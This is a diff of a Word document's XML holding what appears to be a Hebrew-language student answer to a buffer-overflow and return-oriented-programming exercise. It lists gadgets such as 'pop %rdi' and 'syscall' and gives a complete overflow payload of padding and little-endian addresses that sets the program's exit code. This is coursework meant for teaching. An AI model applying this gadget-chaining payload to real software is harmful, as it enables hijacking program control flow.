+        <w:t xml:space="preserve">לבסוף 8 הבתים </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -5743,112 +6457,9 @@
           <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>password</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cs="Arial" w:hint="cs"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:highlight w:val="yellow"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> במחסנית יש את </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cs="Arial"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>rb</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cs="Arial"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>x</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cs="Arial" w:hint="cs"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:highlight w:val="yellow"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ולכן 8 הבתים הבאים </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cs="Arial"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>sticexpi</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cs="Arial" w:hint="cs"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:highlight w:val="yellow"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> יידרסו את הערך שלו.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cs="Arial"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:highlight w:val="yellow"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cs="Arial" w:hint="cs"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:highlight w:val="yellow"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">לבסוף 8 הבתים </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cs="Arial"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
         <w:t>alidocio</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -6220,6 +6831,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> להיעזר ב </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -6230,6 +6842,7 @@
         </w:rPr>
         <w:t>objdump</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -6519,8 +7132,20 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>op %rdi</w:t>
+              <w:t>op %</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>rdi</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -6638,6 +7263,7 @@
                 <w:lang w:val="en-US"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
@@ -6648,6 +7274,7 @@
               </w:rPr>
               <w:t>syscall</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -6740,8 +7367,20 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>pop %rax</w:t>
+              <w:t>pop %</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>rax</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -6877,8 +7516,20 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>op %rsi</w:t>
+              <w:t>op %</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>rsi</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -7075,8 +7726,9 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>dd %r15, %r</w:t>
+              <w:t>dd %r15, %</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
@@ -7085,7 +7737,7 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>d</w:t>
+              <w:t>r</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -7095,8 +7747,19 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
+              <w:t>d</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
               <w:t>i</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -7308,11 +7971,10 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>ush %rbp</w:t>
+              <w:t>ush %</w:t>
             </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
@@ -7320,8 +7982,12 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-            </w:pPr>
-            <w:r>
+              <w:t>rbp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
@@ -7329,8 +7995,7 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>m</w:t>
-            </w:r>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
@@ -7339,11 +8004,9 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>ov %rsp, %rbp</w:t>
+              <w:t>m</w:t>
             </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
+            <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
@@ -7351,7 +8014,9 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-            </w:pPr>
+              <w:t>ov %</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
@@ -7360,8 +8025,9 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>c</w:t>
+              <w:t>rsp</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
@@ -7370,8 +8036,9 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t xml:space="preserve">all </w:t>
+              <w:t>, %</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
@@ -7380,9 +8047,12 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>*</w:t>
+              <w:t>rbp</w:t>
             </w:r>
-            <w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
@@ -7390,8 +8060,59 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>%rax</w:t>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>c</w:t>
             </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">all </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>*</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>%</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>rax</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -7538,8 +8259,21 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>צרפו צילום מסך של ערך היציאה. לכתיבת ערכים בינארים</w:t>
-      </w:r>
+        <w:t xml:space="preserve">צרפו צילום מסך של ערך היציאה. לכתיבת ערכים </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>בינארים</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -7570,8 +8304,20 @@
           <w:bCs w:val="0"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>\xHH</w:t>
-      </w:r>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xHH</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -7755,6 +8501,7 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -7776,6 +8523,7 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -7790,6 +8538,7 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -7800,6 +8549,7 @@
           <w:rFonts w:cs="Calibri"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -7811,6 +8561,7 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x6d\x1b\x40\x00\x00\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00\x71\x0e\x40\x00\x00\x00\x00\x00\x3c\x00\x00\x00\x00\x00\x00\x00\x78\x11\x40\x00\x00\x00\x00\x00</w:t>
@@ -7825,6 +8576,7 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -7835,6 +8587,7 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -7846,6 +8599,7 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>0x61=’a’</w:t>
@@ -7856,6 +8610,7 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -7867,6 +8622,7 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>password</w:t>
@@ -7877,27 +8633,32 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> ואת הערך של </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>rbx</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -7923,6 +8684,7 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -7934,29 +8696,10 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>\x6d\x1b\x40\x00\x00\x00\x00\x00</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>)</w:t>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(\x6d\x1b\x40\x00\x00\x00\x00\x00)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7964,6 +8707,7 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -7975,9 +8719,34 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>“pop %rdi”</w:t>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>“pop %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rdi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>”</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7985,62 +8754,85 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> מהסעיף הקודם שבעזרתה נעדכן את הערך של </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>rdi</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> שצפוי להכיל את ערך היציאה מהתוכנית לאחר שנבצע </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>syscall</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> עבור </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>rax=60</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rax</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>=60</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8048,6 +8840,7 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8059,6 +8852,7 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>exit</w:t>
@@ -8069,6 +8863,7 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8080,6 +8875,7 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8091,6 +8887,7 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8102,29 +8899,10 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>\x48\x00\x00\x00\x00\x00\x00\x00</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>)</w:t>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(\x48\x00\x00\x00\x00\x00\x00\x00)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8132,27 +8910,32 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> יכילו את הערך שנרצה שיהיה ב</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>rdi</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8164,9 +8947,34 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>“pop %rdi”</w:t>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>“pop %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rdi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>”</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8174,6 +8982,7 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8185,6 +8994,7 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
